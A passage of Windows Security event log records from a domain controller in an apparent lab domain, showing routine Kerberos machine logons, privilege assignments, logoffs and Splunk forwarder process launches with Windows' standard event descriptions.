Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FE41A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62577
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:07:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264375
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FE41A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:08:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264379
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264378
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bfc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264380
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1014
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264381
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1424
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264382
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264384
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264383
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xacc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264385
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FC030
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:08:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264388
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x801EE4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:08:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264387
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x801EE4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62590
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:08:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264386
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x801EE4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264399
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80239F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264398
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80248D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264397
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8024D5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264396
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x802586
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62597
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264395
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x802586
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264394
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8024D5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62594
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264393
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8024D5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264392
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80248D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264391
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80248D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264390
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80239F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62593
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264389
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80239F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264401
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264400
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1064
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
